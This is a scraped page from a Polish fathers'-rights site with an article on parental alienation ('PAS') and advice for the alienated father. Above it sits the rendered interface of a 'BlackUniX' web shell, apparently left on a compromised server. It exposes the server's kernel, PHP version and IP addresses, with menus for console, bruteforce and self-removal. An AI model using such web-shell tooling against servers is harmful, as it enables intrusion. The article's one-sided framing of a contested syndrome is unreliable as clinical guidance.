W Stronę Ojca i no co ty Tato

Polecamy

Zamów nasz biuletyn
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 07:14:37
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.85.115
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

PAS-owany na rycerza cz.2
06.08.2007.
ImageMiłość zaborczego rodzica, nie jest bezinteresowna. Jest uzależniana od tego, czy dziecko angażuje się w wojnę z drugim rodzicem. W tej sytuacji, całe życie rodzinne kręci się wokół wojny z drugim rodzicem. Tak samo, jak życie rodziny alkoholowej kręci się wokół picia, tu rodzina skupia się na walce z ojcem.
Efekty są podobne - zapomina się, nie ma czasu na wychowywanie, na zaspokajanie potrzeb dziecka.
Często dziecko  "zostaje PAS-owane na rycerza opiekującego się słabą, skrzywdzoną matką." Pozornie jest to korzystne dla dziecka - szybciej dojrzewa, staje się dorosłe i odpowiedzialne. Jednak faktycznie jest bardzo skrzywdzone, bierze na siebie zbyt duży ciężar. Szuka w sobie winy za problemy i nastroje rodziców. Często nie utrzymuje kontaktów z rówieśnikami, bywa depresyjne.

{mos_sb_discuss:14}W jaki sposób zmienia się dziecko w ofiarę PAS?

Jest to po prostu "pranie mózgu." Matka bezustannie, w różnych formach i przy każdej nadarzającej się okazji sprzedaje swoją wersję rozstania, i całego związku z ojcem. Oczywiście towarzyszy temu mnóstwo negatywnych emocji. Dziecko nie jest w stanie przyjąć i zrozumieć tego wszystkiego na poziomie faktów, zależności, przyczyn i skutków. Ale odbiera emocjonalny wydźwięk tej historii. W miarę prania mózu zaczyna widzieć mamę w roli biednej ofiary, pokrzywdzonej przez złego ojca. Nie rozumie i na ogół nie może zrozumieć, jak to się stało, dlaczego itd. Pamiętajmy, dziecko w młodszym wieku i tak tego wszystkiego nie zrozumie i może czasem, jeśli samo się nie dopytuje nie warto tego tłumaczyć. Lepiej skupić się na jego potrzebach, na zabawie, rozmowie o jego sprawach, kolegach, hobby, a nie o rozstaniu, sytuacji w domu itd.

Miłość zaborczego rodzica, nie jest bezinteresowna. Jest uzależniana od tego, czy dziecko angażuje się w wojnę z drugim rodzicem. W tej sytuacji, całe życie rodzinne kręci się wokół wojny z drugim rodzicem. Tak samo, jak życie rodziny alkoholowej kręci się wokół picia, tu rodzina skupia się na walce z ojcem.
Efekty są podobne - zapomina się, nie ma czasu na wychowywanie, na zaspokajanie potrzeb dziecka.
Często dziecko  "zostaje PAS-owane na rycerza opiekującego się słabą, skrzywdzoną matką." Pozornie jest to korzystne dla dziecka - szybciej dojrzewa, staje się dorosłe i odpowiedzialne. W praktyce jest bardzo skrzywdzone, bierze na siebie zbyt duży ciężar. Szuka w sobie winy za problemy i nastroje rodziców. Często nie utrzymuje kontaktów z rówieśnikami, bywa depresyjne.
I szybko okazuje się, że ta dorosłość jest wykrzywiona i odbija się czkawką w dorosłym życiu na przykład w postaci nadmiernego egocentryzmu.


Co robić?

Bardzo rzadko udaje się skłonić rodzica do zmiany nastawienia. Pokrzywdzonemu rodzicowi pozostaje konsekwenta postawa wobec dziecka:

-zapewnianie dziecka o swojej miłość i chęci spotkania z nim

-nietolerowanie u dziecka zachowań agresywnych, braku szacunku z lęku przed ostatecznym zerwaniem więzi - niezależnie od sytuacji rodzic musi pozostać rodzicem, nie może dać sobie "wejść na głowę"

-nie zmuszanie dziecka do podejmowania wyborów ponad jego siły: kogo bardziej kochasz itd.

-delikatne uświadamianie starszym dzieciom, że mają wpływ na swoje życie i mają prawo do krytycznego oglądu, tego co robi matka

-jeśli dziecko jest kompletnie zmanipulowane, trzeba czekać, aż osiągnie wiek, w którym zacznie samodzielnie myśleć; dopiero wtedy wyjść z propozycjami - adekwatnymi do potrzeb i sytuacji

Oczywiście wszystko to należy robić z dużym wyczuciem, delikatnie.
Niestety, w wielu przypadkach, żaden kontakt nie jest możliwy, ale wydaje się, że konsekwentna postawa - nierezygnowania z dziecka prędzej, czy później przyniesie efekt.


Czytaj cz.1


Przy pisaniu artykułu korzystałem z tekstu

Agnieszki Smrokowskiej-Reichmann, zamieszczonym we "Wspólnych Tematach" z czerwca 2001


 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy potrzebna jest partia mężczyzn?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


22.06.2018.